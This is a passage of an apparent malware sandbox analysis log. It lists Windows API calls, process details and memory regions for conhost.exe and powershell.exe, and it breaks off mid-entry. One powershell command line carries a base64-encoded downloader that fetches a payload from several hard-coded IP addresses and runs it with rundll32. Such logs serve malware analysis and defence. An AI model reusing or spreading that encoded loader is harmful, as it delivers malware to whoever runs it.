[0106.602] free (_Block=0x24ae13d0aa0) [0106.602] free (_Block=0x24ae13ca170) [0106.602] free (_Block=0x24ae13d1430) [0106.602] free (_Block=0x24ae13cab00) [0106.602] free (_Block=0x24ae13d1dc0) [0106.602] free (_Block=0x24ae13d4400) [0106.602] free (_Block=0x24ae13d7d60) [0106.602] free (_Block=0x24ae13d4d90) [0106.602] free (_Block=0x24ae13d5720) [0106.602] free (_Block=0x24ae13d73d0) [0106.602] free (_Block=0x24ae13d86f0) [0106.602] free (_Block=0x24ae13d2750) [0106.602] free (_Block=0x24ae13d30e0) [0106.602] free (_Block=0x24ae13d3a70) [0106.603] free (_Block=0x24ae13d60b0) [0106.603] free (_Block=0x24ae13d6a40) [0106.603] free (_Block=0x24ae13df790) [0106.603] free (_Block=0x24ae13d97f0) [0106.603] free (_Block=0x24ae13dab10) [0106.603] free (_Block=0x24ae13e0120) [0106.603] free (_Block=0x24ae13e0ab0) [0106.603] free (_Block=0x24ae13dd150) [0106.603] free (_Block=0x24ae13da180) [0106.603] free (_Block=0x24ae13e1440) [0106.603] free (_Block=0x24ae13db4a0) [0106.603] free (_Block=0x24ae13dc7c0) [0106.603] free (_Block=0x24ae13dee00) [0106.603] free (_Block=0x24ae13ddae0) [0106.603] free (_Block=0x24ae13e1dd0) [0106.603] free (_Block=0x24ae13e2760) [0106.603] free (_Block=0x24ae13de470) [0106.603] free (_Block=0x24ae13dbe30) [0106.603] free (_Block=0x24ae13e3a80) [0106.604] free (_Block=0x24ae13e60c0) [0106.604] free (_Block=0x24ae13e6a50) [0106.604] free (_Block=0x24ae13e7d70) [0106.604] free (_Block=0x24ae13e8700) [0106.604] free (_Block=0x24ae19766e0) [0106.604] free (_Block=0x24ae19753c0) [0106.604] free (_Block=0x24ae1974a30) [0106.604] free (_Block=0x24ae1975d50) [0106.604] free (_Block=0x24ae197a040) [0106.604] free (_Block=0x24ae1977070) [0106.611] free (_Block=0x24ae13e30f0) [0106.611] free (_Block=0x24ae13e4410) [0106.611] free (_Block=0x24ae13e4da0) [0106.611] free (_Block=0x24ae13e5730) [0106.611] free (_Block=0x24ae13e73e0) [0106.612] free (_Block=0x24ae1458e10) [0106.637] FreeLibrary (hLibModule=0x7ff864cc0000) returned 1 [0106.649] ExitProcess (uExitCode=0x0) [0106.650] free (_Block=0x24ae1459140) Thread: id = 6 os_tid = 0x10e8 Thread: id = 7 os_tid = 0x88c [0098.699] GetClassInfoA (in: hInstance=0x7ff7889d0000, lpClassName="WSH-Timer", lpWndClass=0xd678affb10 | out: lpWndClass=0xd678affb10) returned 0 [0098.699] RegisterClassA (lpWndClass=0xd678affb10) returned 0xc1dd [0098.700] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff7889d0000, lpParam=0x24adfc65b00) returned 0xb003e [0098.706] GetWindowLongPtrA (hWnd=0xb003e, nIndex=-21) returned 0x0 [0098.706] NtdllDefWindowProc_A (hWnd=0xb003e, Msg=0x24, wParam=0x0, lParam=0xd678aff4b0) returned 0x0 [0098.706] GetWindowLongPtrA (hWnd=0xb003e, nIndex=-21) returned 0x0 [0098.706] SetWindowLongPtrA (hWnd=0xb003e, nIndex=-21, dwNewLong=0x24adfc65b00) returned 0x0 [0098.706] NtdllDefWindowProc_A (hWnd=0xb003e, Msg=0x81, wParam=0x0, lParam=0xd678aff470) returned 0x1 [0098.711] GetWindowLongPtrA (hWnd=0xb003e, nIndex=-21) returned 0x24adfc65b00 [0098.711] NtdllDefWindowProc_A (hWnd=0xb003e, Msg=0x83, wParam=0x0, lParam=0xd678aff4d0) returned 0x0 [0098.720] GetWindowLongPtrA (hWnd=0xb003e, nIndex=-21) returned 0x24adfc65b00 [0098.720] NtdllDefWindowProc_A (hWnd=0xb003e, Msg=0x1, wParam=0x0, lParam=0xd678aff470) returned 0x0 [0098.721] SetEvent (hEvent=0x120) returned 1 [0098.805] GetMessageA (in: lpMsg=0xd678affae0, hWnd=0xb003e, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xd678affae0) returned 1 [0098.806] DispatchMessageA (lpMsg=0xd678affae0) returned 0x0 [0098.806] GetWindowLongPtrA (hWnd=0xb003e, nIndex=-21) returned 0x24adfc65b00 [0098.806] NtdllDefWindowProc_A (hWnd=0xb003e, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0098.806] GetMessageA (in: lpMsg=0xd678affae0, hWnd=0xb003e, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xd678affae0) returned 0 [0103.670] GetWindowLongPtrA (hWnd=0xb003e, nIndex=-21) returned 0x24adfc65b00 [0103.742] GetWindowLongPtrA (hWnd=0xb003e, nIndex=-21) returned 0x24adfc65b00 Thread: id = 8 os_tid = 0x1178 Thread: id = 9 os_tid = 0xbe8 Thread: id = 10 os_tid = 0xb24 Thread: id = 11 os_tid = 0xa74 Thread: id = 12 os_tid = 0x330 Thread: id = 13 os_tid = 0x118c Process: id = "2" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x4ee07000" os_pid = "0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcf0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f188" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 274 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 275 start_va = 0x8ba9f30000 end_va = 0x8ba9f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008ba9f30000" filename = "" Region: id = 276 start_va = 0x8baa000000 end_va = 0x8baa1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008baa000000" filename = "" Region: id = 277 start_va = 0x1e2b3500000 end_va = 0x1e2b351ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b3500000" filename = "" Region: id = 278 start_va = 0x1e2b3520000 end_va = 0x1e2b3534fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b3520000" filename = "" Region: id = 279 start_va = 0x7df5ff9d0000 end_va = 0x7ff5ff9cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff9d0000" filename = "" Region: id = 280 start_va = 0x7ff736580000 end_va = 0x7ff7365a2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff736580000" filename = "" Region: id = 281 start_va = 0x7ff737580000 end_va = 0x7ff737590fff monitored = 0 entry_point = 0x7ff7375816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 282 start_va = 0x7ff871e00000 end_va = 0x7ff871fc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 283 start_va = 0x1e2b3540000 end_va = 0x1e2b37dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b3540000" filename = "" Region: id = 284 start_va = 0x7ff871bc0000 end_va = 0x7ff871c6cfff monitored = 0 entry_point = 0x7ff871bd81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 285 start_va = 0x7ff86e520000 end_va = 0x7ff86e707fff monitored = 0 entry_point = 0x7ff86e54ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 286 start_va = 0x1e2b3500000 end_va = 0x1e2b350ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b3500000" filename = "" Region: id = 287 start_va = 0x7ff736480000 end_va = 0x7ff73657ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff736480000" filename = "" Region: id = 288 start_va = 0x1e2b3540000 end_va = 0x1e2b35fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 289 start_va = 0x1e2b36e0000 end_va = 0x1e2b37dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b36e0000" filename = "" Region: id = 290 start_va = 0x7ff86f210000 end_va = 0x7ff86f2acfff monitored = 0 entry_point = 0x7ff86f2178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 291 start_va = 0x8ba9f70000 end_va = 0x8ba9faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008ba9f70000" filename = "" Region: id = 292 start_va = 0x1e2b3600000 end_va = 0x1e2b36cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b3600000" filename = "" Region: id = 293 start_va = 0x1e2b3510000 end_va = 0x1e2b3516fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b3510000" filename = "" Region: id = 294 start_va = 0x7ff85ca00000 end_va = 0x7ff85ca58fff monitored = 0 entry_point = 0x7ff85ca0fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 295 start_va = 0x1e2b3600000 end_va = 0x1e2b3600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b3600000" filename = "" Region: id = 296 start_va = 0x1e2b36c0000 end_va = 0x1e2b36cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b36c0000" filename = "" Region: id = 297 start_va = 0x7ff86f2b0000 end_va = 0x7ff86f52cfff monitored = 0 entry_point = 0x7ff86f384970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 298 start_va = 0x7ff870fd0000 end_va = 0x7ff8710ebfff monitored = 0 entry_point = 0x7ff8710102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 299 start_va = 0x7ff86e4b0000 end_va = 0x7ff86e519fff monitored = 0 entry_point = 0x7ff86e4e6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 300 start_va = 0x7ff8719b0000 end_va = 0x7ff871b05fff monitored = 0 entry_point = 0x7ff8719ba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 301 start_va = 0x7ff871c70000 end_va = 0x7ff871df5fff monitored = 0 entry_point = 0x7ff871cbffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 302 start_va = 0x1e2b3610000 end_va = 0x1e2b3616fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b3610000" filename = "" Region: id = 303 start_va = 0x7ff871860000 end_va = 0x7ff8719a2fff monitored = 0 entry_point = 0x7ff871888210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 304 start_va = 0x7ff86f5b0000 end_va = 0x7ff86f60afff monitored = 0 entry_point = 0x7ff86f5c38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 305 start_va = 0x7ff8711c0000 end_va = 0x7ff8711fafff monitored = 0 entry_point = 0x7ff8711c12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 306 start_va = 0x7ff8710f0000 end_va = 0x7ff8711b0fff monitored = 0 entry_point = 0x7ff871110da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 307 start_va = 0x7ff86c9a0000 end_va = 0x7ff86cb25fff monitored = 0 entry_point = 0x7ff86c9ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 308 start_va = 0x1e2b3620000 end_va = 0x1e2b3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b3620000" filename = "" Region: id = 309 start_va = 0x1e2b3630000 end_va = 0x1e2b3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b3630000" filename = "" Region: id = 310 start_va = 0x1e2b37e0000 end_va = 0x1e2b3967fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b37e0000" filename = "" Region: id = 311 start_va = 0x1e2b3970000 end_va = 0x1e2b3af0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b3970000" filename = "" Region: id = 312 start_va = 0x1e2b3b00000 end_va = 0x1e2b4efffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b3b00000" filename = "" Region: id = 313 start_va = 0x1e2b4f00000 end_va = 0x1e2b4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b4f00000" filename = "" Region: id = 314 start_va = 0x8ba9fb0000 end_va = 0x8ba9feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008ba9fb0000" filename = "" Region: id = 315 start_va = 0x7ff86f9f0000 end_va = 0x7ff870f4efff monitored = 0 entry_point = 0x7ff86fb511f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 316 start_va = 0x7ff86f130000 end_va = 0x7ff86f172fff monitored = 0 entry_point = 0x7ff86f144b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 317 start_va = 0x7ff86e990000 end_va = 0x7ff86efd3fff monitored = 0 entry_point = 0x7ff86eb564b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 318 start_va = 0x7ff871b10000 end_va = 0x7ff871bb6fff monitored = 0 entry_point = 0x7ff871b258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 319 start_va = 0x7ff86f550000 end_va = 0x7ff86f5a1fff monitored = 0 entry_point = 0x7ff86f55f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 320 start_va = 0x7ff86e490000 end_va = 0x7ff86e49efff monitored = 0 entry_point = 0x7ff86e493210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 321 start_va = 0x7ff86f070000 end_va = 0x7ff86f124fff monitored = 0 entry_point = 0x7ff86f0b22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 322 start_va = 0x7ff86e420000 end_va = 0x7ff86e46afff monitored = 0 entry_point = 0x7ff86e4235f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 323 start_va = 0x7ff86e470000 end_va = 0x7ff86e483fff monitored = 0 entry_point = 0x7ff86e4752e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 324 start_va = 0x7ff86cda0000 end_va = 0x7ff86ce35fff monitored = 0 entry_point = 0x7ff86cdc5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 325 start_va = 0x1e2b5000000 end_va = 0x1e2b51dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b5000000" filename = "" Region: id = 326 start_va = 0x1e2b51e0000 end_va = 0x1e2b5516fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 327 start_va = 0x1e2b5520000 end_va = 0x1e2b5738fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b5520000" filename = "" Region: id = 328 start_va = 0x1e2b5740000 end_va = 0x1e2b5957fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b5740000" filename = "" Region: id = 329 start_va = 0x1e2b5000000 end_va = 0x1e2b510afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b5000000" filename = "" Region: id = 330 start_va = 0x1e2b51d0000 end_va = 0x1e2b51dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b51d0000" filename = "" Region: id = 331 start_va = 0x1e2b5960000 end_va = 0x1e2b5b73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b5960000" filename = "" Region: id = 332 start_va = 0x1e2b5b80000 end_va = 0x1e2b5c93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b5b80000" filename = "" Region: id = 333 start_va = 0x8baa200000 end_va = 0x8baa23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008baa200000" filename = "" Region: id = 334 start_va = 0x7ff86f890000 end_va = 0x7ff86f9e9fff monitored = 0 entry_point = 0x7ff86f8d38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 335 start_va = 0x1e2b3640000 end_va = 0x1e2b3640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b3640000" filename = "" Region: id = 336 start_va = 0x1e2b4f00000 end_va = 0x1e2b4fbbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b4f00000" filename = "" Region: id = 337 start_va = 0x1e2b4ff0000 end_va = 0x1e2b4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b4ff0000" filename = "" Region: id = 338 start_va = 0x1e2b3640000 end_va = 0x1e2b3643fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b3640000" filename = "" Region: id = 339 start_va = 0x7ff86bf40000 end_va = 0x7ff86bf61fff monitored = 0 entry_point = 0x7ff86bf41a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 340 start_va = 0x7ff86cb90000 end_va = 0x7ff86cba2fff monitored = 0 entry_point = 0x7ff86cb92760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 341 start_va = 0x7ff86e230000 end_va = 0x7ff86e285fff monitored = 0 entry_point = 0x7ff86e240bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 342 start_va = 0x1e2b3650000 end_va = 0x1e2b3656fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b3650000" filename = "" Region: id = 343 start_va = 0x1e2b3660000 end_va = 0x1e2b3660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b3660000" filename = "" Region: id = 344 start_va = 0x1e2b3670000 end_va = 0x1e2b3670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b3670000" filename = "" Region: id = 345 start_va = 0x1e2b3680000 end_va = 0x1e2b3684fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 346 start_va = 0x1e2b3690000 end_va = 0x1e2b3690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 347 start_va = 0x1e2b36a0000 end_va = 0x1e2b36a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b36a0000" filename = "" Region: id = 348 start_va = 0x1e2b5ca0000 end_va = 0x1e2b5e95fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b5ca0000" filename = "" Region: id = 349 start_va = 0x7ff863b30000 end_va = 0x7ff863da3fff monitored = 0 entry_point = 0x7ff863ba0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 350 start_va = 0x1e2b36b0000 end_va = 0x1e2b36b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 351 start_va = 0x1e2b36d0000 end_va = 0x1e2b36d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b36d0000" filename = "" Region: id = 352 start_va = 0x1e2b5ea0000 end_va = 0x1e2b5f7cfff monitored = 0 entry_point = 0x1e2b5efe0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 353 start_va = 0x1e2b36b0000 end_va = 0x1e2b36b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b36b0000" filename = "" Region: id = 354 start_va = 0x1e2b5ea0000 end_va = 0x1e2b5f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e2b5ea0000" filename = "" Region: id = 355 start_va = 0x1e2b5fa0000 end_va = 0x1e2b619efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e2b5fa0000" filename = "" Thread: id = 2 os_tid = 0xd00 Thread: id = 3 os_tid = 0xd04 Thread: id = 4 os_tid = 0xd10 Thread: id = 5 os_tid = 0xba8 Process: id = "3" image_name = "powershell.exe" filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x38ae000" os_pid = "0x10ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcf0" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedcommand \"UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQATwByAGkAZQBuAHQAZQByACAAPQAgACgAIgBoAHQAdABwADoALwAvADgANwAuADIAMwA2AC4AMQA0ADYALgA5ADMALwBwAG4AcQBnADIASAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwAxADQANwAuADEAMwA1AC4AMgA0ADgALgAyADUAMAAvAFIAUABnAHQAMQBqAEwAaQBTAC4AZABhAHQALABoAHQAdABwADoALwAvADEANQA0AC4ANAA3AC4AMQA3AC4AMQA4ADAALwA3AFAAUQBUAHUAWABmAGIAWQBOAEcAcAAuAGQAYQB0ACwAaAB0AHQAcAA6AC8ALwA3ADkALgAxADQAMQAuADEANwA0AC4AMgA1ADMALwBpAHoAQwA4AGcATABPADAAeABaAC4AZABhAHQALABoAHQAdABwADoALwAvADcAMAAuADMANAAuADIAMQA4AC4AOAA1AC8ARABNADMAOABxAGsAMgBhAEsAegAyADIALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8ANwA0AC4AMQAxADkALgAxADkAMwAuADQAOQAvAEQAeABZAGsARgBPAFYAQgBSAC4AZABhAHQAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAbgBvAG4AcABlAHMAdABpAGwAZQBuAHQAIABpAG4AIAAkAE8AcgBpAGUAbgB0AGUAcgApACAAewB0AHIAeQAgAHsAdwBnAGUAdAAgACQAbgBvAG4AcABlAHMAdABpAGwAZQBuAHQAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAIAAxADcAIAAtAE8AIAAkAGUAbgB2ADoAVABFAE0AUABcAGEAbgBvAG0AbwBlAG8AbQBlAHIAeQAuAG0AZQB0AGEAbABpAHoAZQBkAEMAcgBlAGQAZQBuAGMAZQA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAGEAbgBvAG0AbwBlAG8AbQBlAHIAeQAuAG0AZQB0AGEAbABpAHoAZQBkAEMAcgBlAGQAZQBuAGMAZQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABhAG4AbwBtAG8AZQBvAG0AZQByAHkALgBtAGUAdABhAGwAaQB6AGUAZABDAHIAZQBkAGUAbgBjAGUALABOAGkAawBuADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA=\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f188" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 451 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 452 start_va = 0xafa4000000 end_va = 0xafa41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4000000" filename = "" Region: id = 453 start_va = 0xafa4200000 end_va = 0xafa427ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa4200000" filename = "" Region: id = 454 start_va = 0x2386b320000 end_va = 0x2386b33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b320000" filename = "" Region: id = 455 start_va = 0x2386b340000 end_va = 0x2386b354fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386b340000" filename = "" Region: id = 456 start_va = 0x2386b360000 end_va = 0x2386b363fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386b360000" filename = "" Region: id = 457 start_va = 0x2386b370000 end_va = 0x2386b370fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386b370000" filename = "" Region: id = 458 start_va = 0x2386b380000 end_va = 0x2386b381fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386b380000" filename = "" Region: id = 459 start_va = 0x7df5ff3a0000 end_va = 0x7ff5ff39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff3a0000" filename = "" Region: id = 460 start_va = 0x7ff65bec0000 end_va = 0x7ff65bee2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff65bec0000" filename = "" Region: id = 461 start_va = 0x7ff65c960000 end_va = 0x7ff65c9d7fff monitored = 0 entry_point = 0x7ff65c9631a0 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 462 start_va = 